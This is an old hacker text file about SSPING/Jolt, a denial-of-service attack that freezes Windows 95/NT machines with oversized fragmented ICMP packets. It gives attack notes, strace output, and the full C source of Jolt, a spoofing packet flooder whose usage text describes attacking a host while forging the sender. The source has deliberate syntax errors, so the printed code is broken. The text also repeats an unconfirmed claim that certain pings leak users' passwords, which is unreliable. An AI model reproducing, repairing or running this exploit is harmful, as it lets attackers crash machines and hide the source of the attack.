SSPING/JOLT technical info Information obtained from www.darkening.com/ssping ============================= SSPING was a product of Datagram of Havok, or so it was thought. Jeff W. Robertson has come forward on BugTraq with his original source code however which details this. How it seems to work is it sends the Win95/NT target a series of fragmented IP packets to machine, and when the machine puts them ogether, it then becomes a large packet (>64k?), which resembles the classic Ping of Death attack (ICMP packets > 64K), and then it freezes completely. Hawke also reminded me this isn't the first time Windows95 or NT has had problems with ICMP. There were a few things I thought I might mention after reading your bit on microsoft coding to RFCs and FYIs and in regard to SSPING. These ping problems as you know have been around for a while ranging from the ping of death to the newer SSPING but I have not seen mention of another exploit found about a year ago with ping. And from memory this one sits right in the middle of SSPING and Ping Of Death. Around the 643?? mark as I said this is from memory but I can look it up for you or you can read it your self. One of the phrack authors had been playing with ping slowly working his way up the scale in size and fragmentation when he noticed that pinging a wintel machine with a packet in size between the other two returned the victims login name and password. Using a hex editor { I used Xtree Gold } to look at the debug contents of the returned packet you can in the ASCCI colum as plain as day actually see the users login name and password. Why ICMP stores that info in its buffers or indeed if thats where it comes from is beyond me and I have not had time yet to look into it. But the exploit was originally found to work only on certain stacks. I set up another machine here and tried numerous stacks including the DUN that comes with NT/Win95 and plus pack all with success. The author, Jeff W. Robertson, describes Jolt (the original version of SSPING supposedly) as: Ok so all this does is build a really fraggmented over sized packet and once win95 gets it, and puts it back together it locks. I send multiple packets by default cause some times it takes a few packets to totally freeze the host. Maybe its spending processor time to figure out how to put them back together? I've had reports of people blue screening from it tho so we'll let Microsoft's boys figure out exactly what this does to 95. As of now i haven't tested it on NT, but maybe i will later ;). All of this source wasn't origonally written by me I just took one of the old programs to kill POSIX and SYSV based systems and worked on it abit, then made it spoof =). strace output of a normal ping: sendto(10, "\10\0\2660\7t\2\0\214\26\2663\1\16"..., 64, 0, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("193.14.46.3")}, 16) = 64 strace output of an ssping: sendto(10, "E\0\0\0zi \1\377\1\347\t\317D\234"..., 63, 0, {sin_family=AF_INET, sin_port=htons(0), sin_addr=inet_addr("193.14.46.3")}, 16) = 63 I did end up writing an ssping detector for Linux, based on the icmplogger source, but I wasn't thinking and ran into the problem that ssping has a built in spoofer. I deleted the source code for my ssping detector after it was telling me that www.microsoft.com was sspinging it Source Code I put the source code online now, for educational purposes. I put a flaw in it's syntax in three places, which anyone who could learn anything from this program (C Programmers) should discover easily. This is just so we don't have 30 billion people using this without reason. /* Jolt 1.0 (c) 1997 by Jeff w. Roberson * Please, if you use my code give me credit. Also, if i was the first to * find this glitch, please give me credit. Thats all i ask. * * Ok so all this does is build a really fraggmented over sized packet * and once win95 gets it, and puts it back together it locks. I send * multiple packets by default cause some times it takes a few packets to * totally freeze the host. Maybe its spending processor time to figure * out how to put them back together? I've had reports of people blue * screening from it tho so we'll let Microsoft's boys figure out exactly * what this does to 95. As of now i haven't tested it on NT, but maybe * I will later ;). All of this source wasn't origonally written by me * I just took one of the old programs to kill POSIX and SYSV based * systems and worked on it abit, then made it spoof =). * VallaH (yaway@hotmail.com) * * Update: It apears to work on some older versions of mac os */ /* Yah this is for linux, but i like the BSD ip header better then linux's */ #define __BSD_SOURCE #include #include #include #include #include #include #include #include #include #include int main(int argc, char **argv) { char buf(400); struct ip *ip = (struct ip *)buf; struct icmphdr *icmp = (struct icmphdr *)(ip + 1); struct hostent *hp, *hp2; struct sockaddr_in dst; int offset; int on = 1; int num = 5; bzero(buf, sizeof buf); if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW )) < 0) { perror("socket"); exit(1); } if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) { printf("Jolt v1.0 Yet ANOTHER windows95(And macOS!) glitch by VallaH (yaway@hotmail.com)\n"); printf("\nusage: %s [number]\n",argv[0]); printf("\tdstaddr is the host your attacking\n"); printf("\tsaddr is the host your spoofing from\n"); printf("\tNumber is the number of packets to send, 5 is the default\n"); printf("\nNOTE: This is based on a bug that used to affect POSIX complient, and SYSV \n\t systems so its nothing new..\n"); printf("\nGreets to Bill Gates! How do ya like this one? :-)\n"); exit(1); } if (argc == 4) num = atoi(argv[3]); for (i=1;i<=num;i++) { if ((hp = gethostbyname(argv[1])) == NULL) { if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) { fprintf(stderr, "%s: unknown host\n", argv[1]); exit(1); } } else { bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length; } if ((hp2 = gethostbyname(argv[2])) == NULL) { if ((ip->ip_src.s_addr = inet_addr(argv[2])) == -1) { fprintf(stderr, "%s: unknown host\n", argv[2]); exit(1); } } else { bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); } printf("Sending to %s\n", inet_ntoa(ip->ip_dst)); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons(sizeof buf); ip->ip_id = htons(4321); ip->ip_off = htons(0); ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_csum = 0; /* kernel fills in */ dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->type = ICMP_ECHO; icmp->code = 0; icmp->checksum = htons(~(ICMP_ECHO << 8)); for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) { ip->ip_off = htons(offset >> 3); if (offset < 65120) ip->ip_off |= htons(0x2000); else ip->ip_len = htons(418); /* make total 65538 */ if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst, sizeof dst) < 0) { fprintf(stderr, "offset %d: ", offset); perror("sendto"); } if (offset == 0) { icmp->type = 0; icmp->code = 0; icmp->checksum = 0; } } } return 0; }